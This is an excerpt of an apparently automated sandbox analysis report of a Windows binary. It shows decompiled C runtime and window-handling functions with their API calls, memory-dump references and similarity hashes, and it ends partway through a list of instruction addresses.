                0x003fcbac
                0x003fcbbf
                0x003fcbd2
                0x003fcbe0
                0x003fcbeb
                0x003fcbf0
                0x003fcbf9
                0x003fcc01
                0x003fcc02
                0x003fcc08
                0x003fcc0b
                0x003fcc0e
                0x003fcc15
                0x003fcc17
                0x003fcc1b
                0x003fcc23
                0x003fcc2a
                0x003fcc30
                0x003fcc31
                0x003fcc31
                0x003fcc38
                0x003fcc3a
                0x003fcc3f
                0x003fcc47
                0x003fcc4c
                0x003fcc4d
                0x003fcc4d
                0x003fcc50
                0x003fcc53
                0x003fcc56
                0x003fcc59
                0x003fcc59
                0x003fcc6b

                APIs
                • ___free_lconv_mon.LIBCMT ref: 003FCB66
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC71E
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC730
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC742
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC754
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC766
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC778
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC78A
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC79C
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC7AE
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC7C0
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC7D2
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC7E4
                  • Part of subcall function 003FC701: _free.LIBCMT ref: 003FC7F6
                • _free.LIBCMT ref: 003FCB5B
                  • Part of subcall function 003F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,003FC896,?,00000000,?,00000000,?,003FC8BD,?,00000007,?,?,003FCCBA,?), ref: 003F8DE2
                  • Part of subcall function 003F8DCC: GetLastError.KERNEL32(?,?,003FC896,?,00000000,?,00000000,?,003FC8BD,?,00000007,?,?,003FCCBA,?,?), ref: 003F8DF4
                • _free.LIBCMT ref: 003FCB7D
                • _free.LIBCMT ref: 003FCB92
                • _free.LIBCMT ref: 003FCB9D
                • _free.LIBCMT ref: 003FCBBF
                • _free.LIBCMT ref: 003FCBD2
                • _free.LIBCMT ref: 003FCBE0
                • _free.LIBCMT ref: 003FCBEB
                • _free.LIBCMT ref: 003FCC23
                • _free.LIBCMT ref: 003FCC2A
                • _free.LIBCMT ref: 003FCC47
                • _free.LIBCMT ref: 003FCC5F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID: h@
                • API String ID: 161543041-147436215
                • Opcode ID: 3f0f4db10853ebd6918caa7af935ce73cc3264bcafb26eafdbdd23edcb1dd988
                • Instruction ID: 6f25c5674921ae98024f9a459aa17f847165f1ae792ee6735f404372d3f1037b
                • Opcode Fuzzy Hash: 3f0f4db10853ebd6918caa7af935ce73cc3264bcafb26eafdbdd23edcb1dd988
                • Instruction Fuzzy Hash: 65319C3165034D9FEB26AB38DA42B7AB7E8AF01350F116829F648DB192DF30EC40CB10
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F96F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003F96F1(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x406430) {
					E003F8DCC(_t52);
					_t26 = _a4;
				}
				E003F8DCC( *((intOrPtr*)(_t26 + 0x3c)));
				E003F8DCC( *((intOrPtr*)(_a4 + 0x30)));
				E003F8DCC( *((intOrPtr*)(_a4 + 0x34)));
				E003F8DCC( *((intOrPtr*)(_a4 + 0x38)));
				E003F8DCC( *((intOrPtr*)(_a4 + 0x28)));
				E003F8DCC( *((intOrPtr*)(_a4 + 0x2c)));
				E003F8DCC( *((intOrPtr*)(_a4 + 0x40)));
				E003F8DCC( *((intOrPtr*)(_a4 + 0x44)));
				E003F8DCC( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E003F95A9(5,  &_v8);
				_v8 =  &_a4;
				return E003F95F9(4,  &_v8);
			}




                0x003f96f7
                0x003f96fa
                0x003f9702
                0x003f9705
                0x003f970a
                0x003f970d
                0x003f9711
                0x003f971c
                0x003f9727
                0x003f9732
                0x003f973d
                0x003f9748
                0x003f9753
                0x003f975e
                0x003f976c
                0x003f9774
                0x003f977d
                0x003f9785
                0x003f9799

                APIs
                • _free.LIBCMT ref: 003F9705
                  • Part of subcall function 003F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,003FC896,?,00000000,?,00000000,?,003FC8BD,?,00000007,?,?,003FCCBA,?), ref: 003F8DE2
                  • Part of subcall function 003F8DCC: GetLastError.KERNEL32(?,?,003FC896,?,00000000,?,00000000,?,003FC8BD,?,00000007,?,?,003FCCBA,?,?), ref: 003F8DF4
                • _free.LIBCMT ref: 003F9711
                • _free.LIBCMT ref: 003F971C
                • _free.LIBCMT ref: 003F9727
                • _free.LIBCMT ref: 003F9732
                • _free.LIBCMT ref: 003F973D
                • _free.LIBCMT ref: 003F9748
                • _free.LIBCMT ref: 003F9753
                • _free.LIBCMT ref: 003F975E
                • _free.LIBCMT ref: 003F976C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID: 0d@
                • API String ID: 776569668-2892485553
                • Opcode ID: 9c3bc723d7f50ebc544d096e3960aa72a87b18d922ccc26672695280eb65c432
                • Instruction ID: e1f801fd4ccd3b65783ee39e498600a6a2671aad5649b536c4d6ee8d200ad269
                • Opcode Fuzzy Hash: 9c3bc723d7f50ebc544d096e3960aa72a87b18d922ccc26672695280eb65c432
                • Instruction Fuzzy Hash: 4111A47611014DAFCB06EF54C842DE93BB5EF15390B5154A1FB088F272DE32DA509B84
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003ED69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003ED69E(void* __ecx, void* __edx, void* __eflags, void* __fp0, short _a24, struct HWND__* _a4124) {
				void _v0;
				intOrPtr _v4;
				intOrPtr _v12;
				struct HWND__* _t9;
				void* _t19;
				void* _t26;
				void* _t28;
				void* _t30;
				struct HWND__* _t33;
				struct HWND__* _t36;
				void* _t40;
				void* _t49;

				_t49 = __fp0;
				_t40 = __eflags;
				_t28 = __edx;
				E003EEC50(0x1018);
				_t9 = E003EA5C6(_t40);
				if(_t9 == 0) {
					L12:
					return _t9;
				}
				_t9 = GetWindow(_a4124, 5);
				_t33 = _t9;
				_t30 = 0;
				_t36 = _t33;
				if(_t33 == 0) {
					L11:
					goto L12;
				}
				while(_t30 < 0x200) {
					GetClassNameW(_t33,  &_a24, 0x800);
					if(E003E1FBB( &_a24, L"STATIC") == 0 && (GetWindowLongW(_t33, 0xfffffff0) & 0x0000001f) == 0xe) {
						_t26 = SendMessageW(_t33, 0x173, 0, 0);
						if(_t26 != 0) {
							GetObjectW(_t26, 0x18,  &_v0);
							_t19 = E003EA605(_v4);
							SendMessageW(_t33, 0x172, 0, E003EA80C(_t28, _t49, _t26, E003EA5E4(_v12), _t19));
							DeleteObject(_t26);
						}
					}
					_t9 = GetWindow(_t33, 2);
					_t33 = _t9;
					if(_t33 != _t36) {
						_t30 = _t30 + 1;
						if(_t33 != 0) {
							continue;
						}
					}
					break;
				}
				goto L11;
			}















                0x003ed69e
                0x003ed69e
                0x003ed69e
                0x003ed6a3
                0x003ed6a8
                0x003ed6af
                0x003ed786
                0x003ed78c
                0x003ed78c
                0x003ed6c1
                0x003ed6c7
                0x003ed6c9
                0x003ed6cb
                0x003ed6cf
                0x003ed783
                0x00000000
                0x003ed785
                0x003ed6d6
                0x003ed6ed
                0x003ed704
                0x003ed726
                0x003ed72a
                0x003ed734
                0x003ed73e
                0x003ed75d
                0x003ed764
                0x003ed764
                0x003ed72a
                0x003ed76d
                0x003ed773
                0x003ed777
                0x003ed779
                0x003ed77c
                0x00000000
                0x00000000
                0x003ed77c
                0x00000000
                0x003ed777
                0x00000000

                APIs
                • GetWindow.USER32(?,00000005), ref: 003ED6C1
                • GetClassNameW.USER32(00000000,?,00000800), ref: 003ED6ED
                  • Part of subcall function 003E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,003DC116,00000000,.exe,?,?,00000800,?,?,?,003E8E3C), ref: 003E1FD1
                • GetWindowLongW.USER32(00000000,000000F0), ref: 003ED709
                • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 003ED720
                • GetObjectW.GDI32(00000000,00000018,?), ref: 003ED734
                • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 003ED75D
                • DeleteObject.GDI32(00000000), ref: 003ED764
                • GetWindow.USER32(00000000,00000002), ref: 003ED76D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                • String ID: STATIC
                • API String ID: 3820355801-1882779555
                • Opcode ID: 3834213f58d30ad1b084f6e0608a0b2c659f09cfac750a8af662b71d972c65e7
                • Instruction ID: d67043455a5ba3c2e5bf6b80042a2e5eb057b5742a1520495751ddeac2125281
                • Opcode Fuzzy Hash: 3834213f58d30ad1b084f6e0608a0b2c659f09cfac750a8af662b71d972c65e7
                • Instruction Fuzzy Hash: 621136721007B07BE7226F729C4AFAF766CAF41712F014331FA91A60D5DB748B0546A9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 64%
                			E003F2E31(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t201;
				signed int _t202;
				char _t203;
				signed int _t205;
				signed int _t207;
				signed char* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t214;
				void* _t217;
				signed char* _t220;
				void* _t222;
				void* _t224;
				signed char _t228;
				signed int _t229;
				void* _t231;
				void* _t234;
				void* _t237;
				signed int _t247;
				void* _t250;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr _t253;
				signed int _t254;
				void* _t259;
				void* _t261;
				void* _t264;
				void* _t265;
				signed int _t269;
				signed char* _t270;
				intOrPtr* _t271;
				signed char _t272;
				signed int _t273;
				signed int _t274;
				intOrPtr* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t283;
				signed int _t290;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed char* _t297;
				signed int _t298;
				signed char _t299;
				signed int* _t301;
				signed char* _t304;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t327;
				void* _t329;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;

				_t296 = __edx;
				_push(_t315);
				_t301 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t275 = E003F3DAA(_a8, _a16, _t301);
				_t332 = _t331 + 0xc;
				_v12 = _t275;
				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
					L67:
					_t201 = E003F8D24(_t270, _t296, _t301, _t315);
					asm("int3");
					_t329 = _t332;
					_t333 = _t332 - 0x38;
					_push(_t270);
					_t271 = _v112;
					__eflags =  *_t271 - 0x80000003;
					if(__eflags == 0) {
						return _t201;
					} else {
						_push(_t315);
						_push(_t301);
						_t202 = E003F2AEC(_t271, _t275, _t296, _t301, _t315, __eflags);
						__eflags =  *(_t202 + 8);
						if(__eflags != 0) {
							__imp__EncodePointer(0);
							_t315 = _t202;
							_t222 = E003F2AEC(_t271, _t275, _t296, 0, _t315, __eflags);
							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
								__eflags =  *_t271 - 0xe0434f4d;
								if( *_t271 != 0xe0434f4d) {
									__eflags =  *_t271 - 0xe0434352;
									if( *_t271 != 0xe0434352) {
										_t214 = E003F0961(_t296, 0, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
										_t333 = _t333 + 0x1c;
										__eflags = _t214;
										if(_t214 != 0) {
											L84:
											return _t214;
										}
									}
								}
							}
						}
						_t203 = _a16;
						_v28 = _t203;
						_v24 = 0;
						__eflags =  *(_t203 + 0xc);
						if( *(_t203 + 0xc) > 0) {
							_push(_a24);
							E003F0894(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
							_t298 = _v40;
							_t334 = _t333 + 0x18;
							_t214 = _v44;
							_v20 = _t214;
							_v12 = _t298;
							__eflags = _t298 - _v32;
							if(_t298 >= _v32) {
								goto L84;
							}
							_t277 = _t298 * 0x14;
							__eflags = _t277;
							_v16 = _t277;
							do {
								_t278 = 5;
								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
								_t334 = _t334 + 0xc;
								__eflags = _v64 - _t217;
								if(_v64 > _t217) {
									goto L83;
								}
								__eflags = _t217 - _v60;
								if(_t217 > _v60) {
									goto L83;
								}
								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t283 = _t220[4];
								__eflags = _t283;
								if(_t283 == 0) {
									L81:
									__eflags =  *_t220 & 0x00000040;
									if(( *_t220 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E003F2DB1(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
										_t298 = _v12;
										_t334 = _t334 + 0x30;
									}
									goto L83;
								}
								__eflags =  *((char*)(_t283 + 8));
								if( *((char*)(_t283 + 8)) != 0) {
									goto L83;
								}
								goto L81;
								L83:
								_t298 = _t298 + 1;
								_t214 = _v20;
								_t277 = _v16 + 0x14;
								_v12 = _t298;
								_v16 = _t277;
								__eflags = _t298 - _v32;
							} while (_t298 < _v32);
							goto L84;
						}
						E003F8D24(_t271, _t296, 0, _t315);
						asm("int3");
						_push(_t329);
						_t297 = _v184;
						_push(_t271);
						_push(_t315);
						_push(0);
						_t205 = _t297[4];
						__eflags = _t205;
						if(_t205 == 0) {
							L109:
							_t207 = 1;
							__eflags = 1;
						} else {
							_t276 = _t205 + 8;
							__eflags =  *_t276;
							if( *_t276 == 0) {
								goto L109;
							} else {
								__eflags =  *_t297 & 0x00000080;
								_t304 = _v0;
								if(( *_t297 & 0x00000080) == 0) {
									L91:
									_t272 = _t304[4];
									_t317 = 0;
									__eflags = _t205 - _t272;
									if(_t205 == _t272) {
										L101:
										__eflags =  *_t304 & 0x00000002;
										if(( *_t304 & 0x00000002) == 0) {
											L103:
											_t208 = _a4;
											__eflags =  *_t208 & 0x00000001;
											if(( *_t208 & 0x00000001) == 0) {
												L105:
												__eflags =  *_t208 & 0x00000002;
												if(( *_t208 & 0x00000002) == 0) {
													L107:
													_t317 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t297 & 0x00000002;
													if(( *_t297 & 0x00000002) != 0) {
														goto L107;
													}
												}
											} else {
												__eflags =  *_t297 & 0x00000001;
												if(( *_t297 & 0x00000001) != 0) {
													goto L105;
												}
											}
										} else {
											__eflags =  *_t297 & 0x00000008;
											if(( *_t297 & 0x00000008) != 0) {
												goto L103;
											}
										}
										_t207 = _t317;
									} else {
										_t184 = _t272 + 8; // 0x6e
										_t209 = _t184;
										while(1) {
											_t273 =  *_t276;
											__eflags = _t273 -  *_t209;
											if(_t273 !=  *_t209) {
												break;
											}
											__eflags = _t273;
											if(_t273 == 0) {
												L97:
												_t210 = _t317;
											} else {
												_t274 =  *((intOrPtr*)(_t276 + 1));
												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
													break;
												} else {
													_t276 = _t276 + 2;
													_t209 = _t209 + 2;
													__eflags = _t274;
													if(_t274 != 0) {
														continue;
													} else {
														goto L97;
													}
												}
											}
											L99:
											__eflags = _t210;
											if(_t210 == 0) {
												goto L101;
											} else {
												_t207 = 0;
											}
											goto L110;
										}
										asm("sbb eax, eax");
										_t210 = _t209 | 0x00000001;
										__eflags = _t210;
										goto L99;
									}
								} else {
									__eflags =  *_t304 & 0x00000010;
									if(( *_t304 & 0x00000010) != 0) {
										goto L109;
									} else {
										goto L91;
									}
								}
							}
						}
						L110:
						return _t207;
					}
				} else {
					_t270 = _a4;
					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
						L22:
						_t296 = _a12;
						_v8 = _t296;
						goto L24;
					} else {
						_t315 = 0;
						_t342 = _t270[0x1c];
						if(_t270[0x1c] != 0) {
							goto L22;
						} else {
							_t224 = E003F2AEC(_t270, _t275, _t296, _t301, 0, _t342);
							_t343 =  *((intOrPtr*)(_t224 + 0x10));
							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
								L61:
								return _t224;
							} else {
								_t270 =  *(E003F2AEC(_t270, _t275, _t296, _t301, 0, _t343) + 0x10);
								_t259 = E003F2AEC(_t270, _t275, _t296, _t301, 0, _t343);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t259 + 0x14));
								if(_t270 == 0) {
									goto L67;
								} else {
									if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
										L16:
										_t261 = E003F2AEC(_t270, _t275, _t296, _t301, _t315, _t350);
										_t351 =  *((intOrPtr*)(_t261 + 0x1c)) - _t315;
										if( *((intOrPtr*)(_t261 + 0x1c)) == _t315) {
											L23:
											_t296 = _v8;
											_t275 = _v12;
											L24:
											_v52 = _t301;
											_v48 = 0;
											__eflags =  *_t270 - 0xe06d7363;
											if( *_t270 != 0xe06d7363) {
												L57:
												__eflags = _t301[3];
												if(__eflags <= 0) {
													goto L60;
												} else {
													__eflags = _a24;
													if(__eflags != 0) {
														goto L67;
													} else {
														_push(_a32);
														_push(_a28);
														_push(_t275);
														_push(_t301);
														_push(_a16);
														_push(_t296);
														_push(_a8);
														_push(_t270);
														L68();
														_t332 = _t332 + 0x20;
														goto L60;
													}
												}
											} else {
												__eflags = _t270[0x10] - 3;
												if(_t270[0x10] != 3) {
													goto L57;
												} else {
													__eflags = _t270[0x14] - 0x19930520;
													if(_t270[0x14] == 0x19930520) {
														L29:
														_t315 = _a32;
														__eflags = _t301[3];
														if(_t301[3] > 0) {
															_push(_a28);
															E003F0894(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
															_t296 = _v64;
															_t332 = _t332 + 0x18;
															_t247 = _v68;
															_v44 = _t247;
															_v16 = _t296;
															__eflags = _t296 - _v56;
															if(_t296 < _v56) {
																_t290 = _t296 * 0x14;
																__eflags = _t290;
																_v32 = _t290;
																do {
																	_t291 = 5;
																	_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
																	_t332 = _t332 + 0xc;
																	__eflags = _v104 - _t250;
																	if(_v104 <= _t250) {
																		__eflags = _t250 - _v100;
																		if(_t250 <= _v100) {
																			_t294 = 0;
																			_v20 = 0;
																			__eflags = _v92;
																			if(_v92 != 0) {
																				_t299 = _t270[0x1c];
																				_t251 =  *((intOrPtr*)(_t299 + 0xc));
																				_t252 = _t251 + 4;
																				__eflags = _t252;
																				_v36 = _t252;
																				_t253 = _v88;
																				_v40 =  *_t251;
																				_v24 = _t253;
																				do {
																					asm("movsd");
																					asm("movsd");
																					asm("movsd");
																					asm("movsd");
																					_t327 = _v40;
																					_t314 = _v36;
																					__eflags = _t327;
																					if(_t327 <= 0) {
																						goto L40;
																					} else {
																						while(1) {
																							_push(_t299);
																							_push( *_t314);
																							_t254 =  &_v84;
																							_push(_t254);
																							L87();
																							_t332 = _t332 + 0xc;
																							__eflags = _t254;
																							if(_t254 != 0) {
																								break;
																							}
																							_t299 = _t270[0x1c];
																							_t327 = _t327 - 1;
																							_t314 = _t314 + 4;
																							__eflags = _t327;
																							if(_t327 > 0) {
																								continue;
																							} else {
																								_t294 = _v20;
																								_t253 = _v24;
																								goto L40;
																							}
																							goto L43;
																						}
																						_push(_a24);
																						_push(_v28);
																						E003F2DB1(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
																						_t332 = _t332 + 0x30;
																					}
																					L43:
																					_t296 = _v16;
																					goto L44;
																					L40:
																					_t294 = _t294 + 1;
																					_t253 = _t253 + 0x10;
																					_v20 = _t294;
																					_v24 = _t253;
																					__eflags = _t294 - _v92;
																				} while (_t294 != _v92);
																				goto L43;
																			}
																		}
																	}
																	L44:
																	_t296 = _t296 + 1;
																	_t247 = _v44;
																	_t290 = _v32 + 0x14;
																	_v16 = _t296;
																	_v32 = _t290;
																	__eflags = _t296 - _v56;
																} while (_t296 < _v56);
																_t301 = _a20;
																_t315 = _a32;
															}
														}
														__eflags = _a24;
														if(__eflags != 0) {
															_push(1);
															E003F0150(_t270, _t301, _t315, __eflags);
															_t275 = _t270;
														}
														__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
														if(__eflags < 0) {
															L60:
															_t224 = E003F2AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
															__eflags =  *(_t224 + 0x1c);
															if( *(_t224 + 0x1c) != 0) {
																goto L67;
															} else {
																goto L61;
															}
														} else {
															_t228 = _t301[8] >> 2;
															__eflags = _t301[7];
															if(_t301[7] != 0) {
																__eflags = _t228 & 0x00000001;
																if(__eflags == 0) {
																	_push(_t301[7]);
																	_t229 = E003F384A(_t270, _t301, _t315, _t270);
																	_pop(_t275);
																	__eflags = _t229;
																	if(__eflags == 0) {
																		goto L64;
																	} else {
																		goto L60;
																	}
																} else {
																	goto L54;
																}
															} else {
																__eflags = _t228 & 0x00000001;
																if(__eflags == 0) {
																	goto L60;
																} else {
																	__eflags = _a28;
																	if(__eflags != 0) {
																		goto L60;
																	} else {
																		L54:
																		 *(E003F2AEC(_t270, _t275, _t296, _t301, _t315, __eflags) + 0x10) = _t270;
																		_t237 = E003F2AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
																		_t286 = _v8;
																		 *((intOrPtr*)(_t237 + 0x14)) = _v8;
																		goto L62;
																	}
																}
															}
														}
													} else {
														__eflags = _t270[0x14] - 0x19930521;
														if(_t270[0x14] == 0x19930521) {
															goto L29;
														} else {
															__eflags = _t270[0x14] - 0x19930522;
															if(_t270[0x14] != 0x19930522) {
																goto L57;
															} else {
																goto L29;
															}
														}
													}
												}
											}
										} else {
											_v16 =  *((intOrPtr*)(E003F2AEC(_t270, _t275, _t296, _t301, _t315, _t351) + 0x1c));
											_t264 = E003F2AEC(_t270, _t275, _t296, _t301, _t315, _t351);
											_push(_v16);
											 *(_t264 + 0x1c) = _t315;
											_t265 = E003F384A(_t270, _t301, _t315, _t270);
											_pop(_t286);
											if(_t265 != 0) {
												goto L23;
											} else {
												_t301 = _v16;
												_t353 =  *_t301 - _t315;
												if( *_t301 <= _t315) {
													L62:
													E003F7AF4(_t270, _t286, _t296, _t301, _t315, __eflags);
												} else {
													while(1) {
														_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
														if(E003F34D3( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0x40efb4) != 0) {
															goto L63;
														}
														_t315 = _t315 + 0x10;
														_t269 = _v20 + 1;
														_v20 = _t269;
														_t353 = _t269 -  *_t301;
														if(_t269 >=  *_t301) {
															goto L62;
														} else {
															continue;
														}
														goto L63;
													}
												}
												L63:
												_push(1);
												_push(_t270);
												E003F0150(_t270, _t301, _t315, __eflags);
												_t275 =  &_v64;
												E003F34BB( &_v64);
												E003F238D( &_v64, 0x40c284);
												L64:
												 *(E003F2AEC(_t270, _t275, _t296, _t301, _t315, __eflags) + 0x10) = _t270;
												_t231 = E003F2AEC(_t270, _t275, _t296, _t301, _t315, __eflags);
												_t275 = _v8;
												 *(_t231 + 0x14) = _v8;
												__eflags = _t315;
												if(_t315 == 0) {
													_t315 = _a8;
												}
												E003F0A87(_t275, _t315, _t270);
												E003F374A(_a8, _a16, _t301);
												_t234 = E003F3907(_t301);
												_t332 = _t332 + 0x10;
												_push(_t234);
												E003F36C1(_t270, _t275, _t296, _t301, _t315, __eflags);
												goto L67;
											}
										}
									} else {
										_t350 = _t270[0x1c] - _t315;
										if(_t270[0x1c] == _t315) {
											goto L67;
										} else {
											goto L16;
										}
									}
								}
							}
						}
					}
				}
			}























































































                0x003f2e31
                0x003f2e38
                0x003f2e3a
                0x003f2e43
                0x003f2e49
                0x003f2e51
                0x003f2e53
                0x003f2e56
                0x003f2e5c
                0x003f31d0
                0x003f31d0
                0x003f31d5
                0x003f31d7
                0x003f31d9
                0x003f31dc
                0x003f31dd
                0x003f31e0
                0x003f31e6
                0x003f3305
                0x003f31ec
                0x003f31ec
                0x003f31ed
                0x003f31ee
                0x003f31f5
                0x003f31f8
                0x003f31fb
                0x003f3201
                0x003f3203
                0x003f3208
                0x003f320b
                0x003f320d
                0x003f3213
                0x003f3215
                0x003f321b
                0x003f3230
                0x003f3235
                0x003f3238
                0x003f323a
                0x003f3301
                0x00000000
                0x003f3302
                0x003f323a
                0x003f321b
                0x003f3213
                0x003f320b
                0x003f3240
                0x003f3243
                0x003f3246
                0x003f3249
                0x003f324c
                0x003f3252
                0x003f3264
                0x003f3269
                0x003f326c
                0x003f326f
                0x003f3272
                0x003f3275
                0x003f3278
                0x003f327b
                0x00000000
                0x00000000
                0x003f3281
                0x003f3281
                0x003f3284
                0x003f3287
                0x003f3296
                0x003f3297
                0x003f3297
                0x003f3299
                0x003f329c
                0x00000000
                0x00000000
                0x003f329e
                0x003f32a1
                0x00000000
                0x00000000
                0x003f32af
                0x003f32b1
                0x003f32b4
                0x003f32b6
                0x003f32be
                0x003f32be
                0x003f32c1
                0x003f32c3
                0x003f32c5
                0x003f32e1
                0x003f32e6
                0x003f32e9
                0x003f32e9
                0x00000000
                0x003f32c1
                0x003f32b8
                0x003f32bc
                0x00000000
                0x00000000
                0x00000000
                0x003f32ec
                0x003f32ef
                0x003f32f0
                0x003f32f3
                0x003f32f6
                0x003f32f9
                0x003f32fc
                0x003f32fc
                0x00000000
                0x003f3287
                0x003f3306
                0x003f330b
                0x003f330c
                0x003f330f
                0x003f3312
                0x003f3313
                0x003f3314
                0x003f3315
                0x003f3318
                0x003f331a
                0x003f3392
                0x003f3394
                0x003f3394
                0x003f331c
                0x003f331c
                0x003f331f
                0x003f3322
                0x00000000
                0x003f3324
                0x003f3324
                0x003f3327
                0x003f332a
                0x003f3331
                0x003f3331
                0x003f3334
                0x003f3336
                0x003f3338
